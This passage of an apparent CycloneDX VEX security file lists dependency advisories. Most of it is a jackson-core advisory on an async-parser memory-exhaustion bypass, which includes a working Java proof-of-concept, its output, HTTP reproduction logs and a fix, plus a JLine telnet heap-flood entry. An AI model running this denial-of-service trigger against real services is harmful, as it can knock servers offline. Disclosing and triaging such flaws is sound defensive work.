          "ref": "urn:cdx:a01ea052-e695-444c-befa-01774aabc231/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#69bb2bc0-1cdc-41bb-94df-6c5233916d74"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:88a1e54d-a0a8-41ec-9994-842626967a53/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:0a2a2284-e186-40c4-84a6-9946617cb8d0/1#9fb00781-15ac-441a-8c36-f84d7e0f38e8"
        },
        {
          "ref": "urn:cdx:73af4a37-1312-4900-9e6e-f1a74c04e48b/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#9f7aa80a-0e89-401b-a1a6-8eda1e3895f0"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:e7f0e99d-6e24-448f-8ce9-0d3e2dfc36a2/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#ea5574b5-ad91-4db6-8aa6-c7d7313a218d"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#b6ba5a9e-e1b3-46ec-9028-07c384592d7b"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#f6c512bc-73c5-4628-a0e8-b658b3d7af76"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#ffbc1f98-e2f2-458f-9e4c-63aa02239775"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#f7bfbfb0-9b0c-4b82-8cb9-6dbb084abb35"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#fbb746a9-fd76-4193-abe3-302eac53ca1f"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#dd784541-adc8-40c0-b2fa-9bfeace52539"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#c47be594-1ee9-449a-bd4a-f32127d64866"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#d63084ae-4792-4030-b143-56af2f0b3a07"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#f5f90bd8-21b0-4253-bfa9-385081effac8"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#e957d906-c42e-4fb7-bfc8-c6ff62a11be3"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#b2ce0dc9-ee06-494d-ad4a-0c0663e6c724"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#ab3e6ae4-c670-4606-8cee-cbd23914cb70"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#b9c07a39-fd27-434d-8891-5111f0472387"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#d186c746-922b-43dd-bd1f-d442c97b2304"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#a4a8ed8c-a7d6-41f4-a90f-b12e7b231ac3"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#e297498f-7f89-44c0-92ea-ac5ee12bd35d"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "GHSA-r7wm-3cxj-wff9",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [],
      "description": "## Summary\n\nThe fix released in jackson-core `2.18.6` and `2.21.1` for [GHSA-72hv-8253-57qq](https://github.com/FasterXML/jackson-core/security/advisories/GHSA-72hv-8253-57qq) (Number Length Constraint Bypass in Async Parser, published 2026-02-28) is incomplete. The fix commit `b0c428e6` (#1555) wired `validateIntegerLength` into a new `_setIntLength` helper and called it at every place where the integer portion of a number is *decided* (terminator byte arrived, `.` / `e/E` seen, end-of-feed inside a fully-buffered value). It did not call it on the much more attacker-relevant path: \"ran out of input while still inside `MINOR_NUMBER_INTEGER_DIGITS`, return `NOT_AVAILABLE` to caller\".\n\nAs a result, an attacker who streams JSON to a non-blocking parser in many small chunks, without ever sending a terminator byte, can keep the parser inside `MINOR_NUMBER_INTEGER_DIGITS` indefinitely. `_textBuffer.expandCurrentSegment()` grows on every chunk, and `validateIntegerLength` is never invoked. The accumulator is only gated by `maxStringLength` (20 MiB default) \u2014 a **~20,000x amplification** of the documented `maxNumberLength` (1000 default).\n\nThis is the same vulnerability class, same advisory wording (\"Memory Exhaustion: Unbounded allocation in TextBuffer from excessively long numbers\"), same parser class \u2014 just the streaming path the original fix didn't cover. The fix to the *fraction* path is correct (see `_finishFloatFraction` at line 1834-1837 of `NonBlockingUtf8JsonParserBase.java` in 2.18.6, where `_setFractLength(fractLen)` IS called before the `NOT_AVAILABLE` return); the equivalent call is missing from every integer-digit path.\n\n## Affected versions\n\nVerified on the patched releases:\n- `com.fasterxml.jackson.core:jackson-core` **2.18.6**\n- `com.fasterxml.jackson.core:jackson-core` **2.21.1**\n\nStructurally identical code in `tools.jackson.core` 3.0.x / 3.1.x \u2014 same `NonBlockingUtf8JsonParserBase` class, same `_setIntLength` rollout, same NOT_AVAILABLE returns without validation. Not retested but presumed vulnerable.\n\n## Affected code\n\n[`src/main/java/com/fasterxml/jackson/core/json/async/NonBlockingUtf8JsonParserBase.java`](https://github.com/FasterXML/jackson-core/blob/b0c428e6/src/main/java/com/fasterxml/jackson/core/json/async/NonBlockingUtf8JsonParserBase.java) in 2.18.6 / 2.21.1.\n\n### Site 1 \u2014 `_startPositiveNumber(int ch)` lines 1320-1330:\n\n```java\nif (outPtr >= outBuf.length) {\n    // NOTE: must expand to ensure contents all in a single buffer (to keep\n    // other parts of parsing simpler)\n    outBuf = _textBuffer.expandCurrentSegment();\n}\noutBuf[outPtr++] = (char) ch;\nif (++_inputPtr >= _inputEnd) {\n    _minorState = MINOR_NUMBER_INTEGER_DIGITS;\n    _textBuffer.setCurrentLength(outPtr);\n    return _updateTokenToNA();          // <-- no validateIntegerLength(outPtr)\n}\n```\n\n### Site 2 \u2014 `_finishNumberIntegralPart` lines 1691-1727:\n\n```java\nprotected JsonToken _finishNumberIntegralPart(char[] outBuf, int outPtr) throws IOException {\n    int negMod = _numberNegative ? -1 : 0;\n\n    while (true) {\n        if (_inputPtr >= _inputEnd) {\n            _minorState = MINOR_NUMBER_INTEGER_DIGITS;\n            _textBuffer.setCurrentLength(outPtr);\n            return _updateTokenToNA();    // <-- no validateIntegerLength(outPtr + negMod)\n        }\n        int ch = getByteFromBuffer(_inputPtr) & 0xFF;\n        if (ch < INT_0) {\n            if (ch == INT_PERIOD) {\n                _setIntLength(outPtr+negMod);   // <-- validated here\n                ++_inputPtr;\n                return _startFloat(outBuf, outPtr, ch);\n            }\n            break;\n        }\n        if (ch > INT_9) {\n            if ((ch | 0x20) == INT_e) {\n                _setIntLength(outPtr+negMod);   // <-- validated here\n                ++_inputPtr;\n                return _startFloat(outBuf, outPtr, ch);\n            }\n            break;\n        }\n        ++_inputPtr;\n        if (outPtr >= outBuf.length) {\n            outBuf = _textBuffer.expandCurrentSegment();\n        }\n        outBuf[outPtr++] = (char) ch;\n    }\n    _setIntLength(outPtr+negMod);            // <-- validated here\n    _textBuffer.setCurrentLength(outPtr);\n    return _valueComplete(JsonToken.VALUE_NUMBER_INT);\n}\n```\n\nThe pattern recurs at lines 1297, 1329, 1343, 1365, 1395, 1409, 1437, 1467, 1481, 1586, 1644, 1698 \u2014 every \"ran out of input mid-integer\" exit returns to the caller without validating the accumulator length.\n\n### Compare with the fraction path that is correct\n\n`_finishFloatFraction` lines 1827-1838:\n\n```java\nwhile (loop) {\n    if (ch >= INT_0 && ch <= INT_9) {\n        ++fractLen;\n        if (outPtr >= outBuf.length) {\n            outBuf = _textBuffer.expandCurrentSegment();\n        }\n        outBuf[outPtr++] = (char) ch;\n        if (_inputPtr >= _inputEnd) {\n            _textBuffer.setCurrentLength(outPtr);\n            _setFractLength(fractLen);          // <-- VALIDATED\n            return JsonToken.NOT_AVAILABLE;\n        }\n        ch = getNextSignedByteFromBuffer();\n    }\n    ...\n}\n```\n\n## Impact\n\nReactive frameworks (Spring WebFlux / Reactor, Quarkus, Helidon, Vert.x JSON, anything wrapping `JsonFactory.createNonBlockingByteArrayParser()` or `createNonBlockingByteBufferParser()`) feed inbound HTTP/gRPC bytes to the async parser as they arrive. Operators who set `StreamReadConstraints.builder().maxNumberLength(N)` on the assumption that this caps memory per number value are not getting that guarantee in chunked-feed scenarios. The parser silently accumulates digits up to `maxStringLength` (20 MiB default) per concurrent connection. Multiply by attacker-controlled concurrency to OOM the JVM.\n\nThe synchronous parsers (`UTF8StreamJsonParser`, `ReaderBasedJsonParser`) and the async parser on *complete* input are not affected \u2014 those paths go through `_setIntLength` or `ParserBase._reportTooLongIntegral` correctly.\n\nCWE-770 (Allocation of Resources Without Limits or Throttling), CVSS roughly the same as the parent advisory (Network / Low complexity / High availability impact). The parent advisory was scored CVSS 8.7 High.\n\n## Proof of concept\n\nStandalone PoC, no Maven required:\n\n```\nmkdir poc && cd poc\ncurl -sLo jackson-core-2.18.6.jar https://repo1.maven.org/maven2/com/fasterxml/jackson/core/jackson-core/2.18.6/jackson-core-2.18.6.jar\ncat > PoC.java <<'EOF'\nimport com.fasterxml.jackson.core.*;\nimport com.fasterxml.jackson.core.async.ByteArrayFeeder;\n\npublic class PoC {\n    public static void main(String[] args) throws Exception {\n        StreamReadConstraints strict = StreamReadConstraints.builder()\n                .maxNumberLength(1000)\n                .build();\n        JsonFactory f = new JsonFactoryBuilder()\n                .streamReadConstraints(strict)\n                .build();\n\n        // Sanity: synchronous parser rejects 5000-digit int.\n        try (JsonParser p = f.createParser(\"{\\\"v\\\":\" + \"1\".repeat(5000) + \"}\")) {\n            while (p.nextToken() != null) { /* drive */ }\n            System.out.println(\"[-] BUG ABSENT: sync parser accepted\");\n            return;\n        } catch (Exception e) {\n            System.out.println(\"[+] sync parser rejected 5000-digit int: \" + e.getClass().getSimpleName());\n        }\n\n        // Bug: async parser, chunked, no terminator.\n        JsonParser ap = f.createNonBlockingByteArrayParser();\n        ByteArrayFeeder feeder = (ByteArrayFeeder) ap;\n\n        byte[] preamble = \"{\\\"v\\\":\".getBytes(\"UTF-8\");\n        feeder.feedInput(preamble, 0, preamble.length);\n        while (ap.nextToken() != JsonToken.NOT_AVAILABLE) { /* drain */ }\n\n        byte[] digits = new byte[16 * 1024];\n        for (int i = 0; i < digits.length; i++) digits[i] = (byte) ('1' + (i % 9));\n\n        for (int c = 0; c < 600; c++) {\n            feeder.feedInput(digits, 0, digits.length);\n            JsonToken t = ap.nextToken();\n            if (t != JsonToken.NOT_AVAILABLE) {\n                System.out.println(\"[-] unexpected token: \" + t);\n                return;\n            }\n        }\n        System.out.println(\"[+] BUG PRESENT: async parser accepted ~9.83 MB of digits with maxNumberLength=1000\");\n\n        // Closing the number now finally triggers the validator.\n        feeder.feedInput(\"}\".getBytes(\"UTF-8\"), 0, 1);\n        feeder.endOfInput();\n        try {\n            while (ap.nextToken() != null) { /* drive */ }\n        } catch (Exception e) {\n            System.out.println(\"[*] late rejection on close: \" + e.getMessage().split(\"\\n\")[0]);\n        }\n        ap.close();\n    }\n}\nEOF\njavac -cp jackson-core-2.18.6.jar PoC.java\njava -Xmx256m -cp jackson-core-2.18.6.jar:. PoC\n```\n\nObserved output against `jackson-core-2.18.6`:\n\n```\n[+] sync parser rejected 5000-digit int: StreamConstraintsException\n[+] BUG PRESENT: async parser accepted ~9.83 MB of digits with maxNumberLength=1000\n[*] late rejection on close: Number value length (9830400) exceeds the maximum allowed (1000, from `StreamReadConstraints.getMaxNumberLength()`)\n```\n\nObserved output against `jackson-core-2.21.1`: identical.\n\nThe 9.83 MB figure is purely a function of the loop bound (600 chunks * 16 KiB). The actual ceiling is `maxStringLength = 20 MiB`. With the strict policy declared as `maxNumberLength = 1000`, the parser permits **9830x** more allocation than the policy allows. With `maxStringLength` left at the default 20 MiB, an attacker can drive a single connection to 40 MiB of `char[]` heap (chars are 2 bytes each) before the validator finally fires on terminator/`endOfInput()`. Multiply by concurrent connections.\n\n## End-to-end reproduction through real HTTP\n\nSupplements the standalone PoC with a running Spring Boot WebFlux server,\ndriving the same bug through the actual reactor-netty + Jackson2JsonDecoder\nstreaming-decode path that production reactive endpoints use.\n\nSetup:\n- Spring Boot 3.3.5 starter-webflux (spring-webflux 6.1.14, reactor-netty 1.1.23)\n- jackson-databind 2.17.2, jackson-core overridden:\n  - VULN run: `com.fasterxml.jackson.core:jackson-core:2.18.7` (latest published)\n  - PATCHED run: `2.18.8-SNAPSHOT` built from the fix branch\n- JVM: OpenJDK 17.0.18\n- Server `JsonFactory` configured with `StreamReadConstraints.builder().maxNumberLength(1000).build()`\n\nEndpoint under test exposes the `Flux<DataBuffer>` request body directly to\n`Jackson2JsonDecoder.decode(Flux, ResolvableType, ...)` so the parser sees one\nHTTP chunk per `feedInput` (the same pattern used for any\n`@RequestBody Flux<...>` / streaming JSON decoder in WebFlux). A raw-socket\nHTTP/1.1 chunked client streams `{\"v\":1` then 250 chunks of 200 digit bytes\neach (50,000 digits total) at 20ms intervals, then writes the closing `}`.\n\nVULN \u2014 jackson-core 2.18.7:\n```\n[VULN-SMALLCHUNK] streamed 50000 digits across 250 chunks; server still accepting\n[VULN-SMALLCHUNK] full POST sent (50000 digits). Response:\nHTTP/1.1 200 OK\nERR after 6548ms cause=com.fasterxml.jackson.core.exc.StreamConstraintsException:\n       Number value length (50000) exceeds the maximum allowed (1000, ...)\n```\nServer-side controller trace (250 DataBuffer arrivals elided):\n```\n[ctrl] DataBuffer arrived size=6   ms=39       <- '{\"v\":1'\n[ctrl] DataBuffer arrived size=200 ms=42\n...\n[ctrl] DataBuffer arrived size=199 ms=5993\n[ctrl] DataBuffer arrived size=1   ms=6518     <- closing '}'\n[ctrl] ERR after 6548ms ... Number value length (50000) exceeds ...\n```\nServer held all 50,000 digit characters in `_textBuffer` for 6.5 seconds with\n`maxNumberLength=1000` declared. The validator never fires during streaming;\nit only fires at value-completion when the closing `}` arrives.\n\nPATCHED \u2014 jackson-core 2.18.8-SNAPSHOT (fix branch):\n```\n[PATCHED-SMALLCHUNK] connection broke after 2801 digits at chunk 14: [Errno 32] Broken pipe\n[PATCHED-SMALLCHUNK] DONE: digits_sent=2801 status=connection-broke-mid-stream\n```\nServer-side controller trace:\n```\n[ctrl] DataBuffer arrived size=6   ms=129\n[ctrl] DataBuffer arrived size=200 ms=142\n[ctrl] DataBuffer arrived size=200 ms=142\n[ctrl] DataBuffer arrived size=200 ms=145\n[ctrl] DataBuffer arrived size=200 ms=146\n[ctrl] DataBuffer arrived size=200 ms=147\n[ctrl] ERR after 155ms ... Number value length (1001) exceeds the maximum allowed (1000, ...)\n```\nPatched server raises `StreamConstraintsException` at 155ms after only 5\nDataBuffers, exactly when the accumulated digit count crosses\n`maxNumberLength=1000`. The connection is reset mid-stream rather than the\nparser silently consuming the rest of the attacker's payload.\n\nSide-by-side:\n\n| Build | Chunks accepted before exception | Digits buffered | Time to detection |\n|---|---|---|---|\n| jackson-core 2.18.7 | 250 (full payload) | 50,000 (50x the configured limit) | 6,548ms \u2014 only at terminator |\n| 2.18.8-SNAPSHOT (fix branch) | 5 | 1,001 | 155ms \u2014 moment threshold crossed |\n\nNote on the default `@RequestBody Mono<JsonNode>` path: that path cannot\ndistinguish the two builds because Spring's `decodeToMono` joins all\nDataBuffers into one before parsing. The exploitable shape is the\nstreaming-decode path (`Flux<JsonNode>` / `@RequestBody Flux<...>` /\nWebSocket / SSE / any direct `decoder.decode(Flux<DataBuffer>, ...)` call),\nwhich is also what `Jackson2Tokenizer` uses for any streaming JSON\ndeserialization in WebFlux and Quarkus reactive REST.\n\n## Suggested fix\n\nMirror the pattern already used in `_finishFloatFraction`. At every site that returns `_updateTokenToNA()` (or `JsonToken.NOT_AVAILABLE`) with `_minorState = MINOR_NUMBER_INTEGER_DIGITS`, call `_setIntLength(outPtr + negMod)` first. Concretely, the diff to `NonBlockingUtf8JsonParserBase.java` would be:\n\n```diff\n     protected JsonToken _finishNumberIntegralPart(char[] outBuf, int outPtr) throws IOException {\n         int negMod = _numberNegative ? -1 : 0;\n\n         while (true) {\n             if (_inputPtr >= _inputEnd) {\n                 _minorState = MINOR_NUMBER_INTEGER_DIGITS;\n                 _textBuffer.setCurrentLength(outPtr);\n+                _streamReadConstraints.validateIntegerLength(outPtr + negMod);\n                 return _updateTokenToNA();\n             }\n```\n\nNote: `_setIntLength` itself can't be used as-is because it also assigns `_intLength`, and `_intLength` must not be set until the integer is truly complete (subsequent fraction handling reads `_intLength`). The minimal fix is to call only the validator, as shown.\n\nApply the same one-line insertion before each `return _updateTokenToNA();` that exits with `_minorState = MINOR_NUMBER_INTEGER_DIGITS`. The sites are listed above (12 lines total).\n\nAlternatively, a heavier refactor: also gate `_textBuffer.expandCurrentSegment()` calls inside the digit-accumulation loops on `outPtr < maxNumberLength` so that the validator fires at the moment the buffer would be enlarged past the limit, rather than waiting for the next chunk boundary. Either approach is sufficient.\n\n## Credit\n\nReported by `tonghuaroot` (`tonghuaroot@gmail.com`). Variant hunt against the Feb 2026 fix for GHSA-72hv-8253-57qq.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-core to version 2.18.8, 2.21.4",
      "advisories": [
        {
          "url": "https://github.com/advisories/GHSA-r7wm-3cxj-wff9"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core/commit/050b429804dce2a7e08f0be1b0b4c3d040fdb9cd"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core/commit/4cdd529749da396cc7edf6d4a2aad41d47902641"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core/commit/c5941e5aae7fd5aeac55d66933cfb82b9aabeef8"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core/pull/1611"
        },
        {
          "url": "https://github.com/FasterXML/jackson-core/security/advisories/GHSA-r7wm-3cxj-wff9"
        }
      ],
      "published": "2026-07-21T21:58:53+00:00",
      "updated": "2026-08-03T20:30:41+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:877815a2-1847-4c19-972b-51244bcc82dd/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:a01ea052-e695-444c-befa-01774aabc231/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:50fb2294-f11b-414d-a002-8a150d5f35e2/1#5c34c6dc-6461-4aee-be4a-af1635a0b529"
        },
        {
          "ref": "urn:cdx:1839f13b-6a18-4e7b-b310-7da0ee6a32ad/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:7d56b569-5272-47f2-a33d-d86bd677f6c9/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:ea5ed770-fbdf-4f09-96ee-b278412c62d3/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:88a1e54d-a0a8-41ec-9994-842626967a53/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:0a2a2284-e186-40c4-84a6-9946617cb8d0/1#f2163322-0afc-4ca0-8236-b61296cc54ef"
        },
        {
          "ref": "urn:cdx:73af4a37-1312-4900-9e6e-f1a74c04e48b/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:31443ff6-1226-453d-ad8c-b0b839b16266/1#c3010e27-8b37-4a9f-a4fe-cffac6118b42"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:e7f0e99d-6e24-448f-8ce9-0d3e2dfc36a2/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:fe1a73d2-1fae-4971-95ae-518949f1e0d6/1#c9bf7192-b231-4215-92c8-19da94e468ad"
        },
        {
          "ref": "urn:cdx:926511d8-a5cf-4677-a808-9889fa46da3a/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#f21dab5d-a6e4-428e-946d-713fe35c6429"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#ffc672c6-a209-4007-bad2-c9e67d54f2df"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#e32b8295-6d80-4f26-ad95-46588c168c3a"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#eab5627b-ad8d-46be-ac68-19b4259ada76"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#e84a7158-8516-4493-b79b-5a55da1e814e"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#ec612607-4413-4c98-b4ab-248995d57a1e"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#eee5e39a-d4aa-4ab5-99db-b5da629dae27"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#f73dce30-06c6-4f99-9913-7378e6be5b81"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#eef85322-db7c-4643-a54d-b33a75af4078"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#f1c9ee67-79b0-4a08-818b-27af4dafd3f1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#2b565c43-bfec-4647-9206-44bfff7b6b1a"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#fef5bdca-b289-4c89-a939-6e7f961e8409"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#d7c9b62e-da17-461f-8136-ffcd22943ddf"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#d0fbe622-3ab7-4e42-a4bb-464aa0e316e9"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#ef921df5-a4fa-4508-966e-d693f8d3b7ce"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#ff7ef9e0-ddbb-4f33-9cd8-10c285943b5c"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:maven/com.fasterxml.jackson.core/jackson-core@2.18.6"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. All CP REST APIs are built on blocking Jackson deserialization; the non-blocking async parser API this issue requires is never used anywhere in the CP repo set."
      }
    },
    {
      "id": "CVE-2026-56740",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "JLine is a Java library for handling console input. Prior to 3.30.14, 4.0.16, and 4.2.1, the JLine3 Telnet server remote-telnet module does not limit the number of environment variables a client may inject via the Telnet NEW-ENVIRON option, and TelnetIO.readNEVariables() in TelnetIO.java:1127-1180 stores each variable pair in a HashMap held by ConnectionData, allowing an unauthenticated attacker to flood unique variable pairs before the terminating IAC SE byte and exhaust JVM heap memory with an OutOfMemoryError. This issue is fixed in versions 3.30.14, 4.0.16, and 4.2.1.",
      "recommendation": "Upgrade org.jline:jline-remote-telnet to version 4.2.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56740"
        },
        {
          "url": "https://github.com/jline/jline3"
        },
        {
          "url": "https://github.com/jline/jline3/commit/0389f0ee6d0375901b602671ad5dafd4d1d4ee09"
        },
        {
          "url": "https://github.com/jline/jline3/commit/4ee3a73849ffb9a85ec748e4e8cd8f6d81f84f40"
        },
        {
          "url": "https://github.com/jline/jline3/commit/934f09e6128cee33c2b13d42b6e859c1ee2d194b"
        },
        {
          "url": "https://github.com/jline/jline3/pull/2000"
        },
        {
          "url": "https://github.com/jline/jline3/pull/2001"
        },
        {
          "url": "https://github.com/jline/jline3/releases/tag/4.0.16"
        },
        {
          "url": "https://github.com/jline/jline3/releases/tag/4.2.1"
        },
        {
          "url": "https://github.com/jline/jline3/releases/tag/jline-3.30.14"
        },
        {
          "url": "https://github.com/jline/jline3/security/advisories/GHSA-47qp-hqvx-6r3f"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56740"
        }
      ],
      "published": "2026-07-17T22:17:57+00:00",
      "updated": "2026-08-18T15:23:04+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.jline/jline-remote-telnet@3.22.0",
          "versions": [
            {
              "version": "3.22.0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.jline/jline-remote-telnet@3.25.0",
          "versions": [
            {
              "version": "3.25.0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0bff854c-463d-426b-b9ed-2e6b564da7b9/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:36048e5d-22a1-48a8-8b91-d48b353ddac7/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        },
        {
          "ref": "urn:cdx:5a41366f-81c7-467f-a944-b70c66237100/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:maven/org.jline/jline-remote-telnet@3.25.0"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:maven/org.jline/jline-remote-telnet@3.22.0"
        },
        {
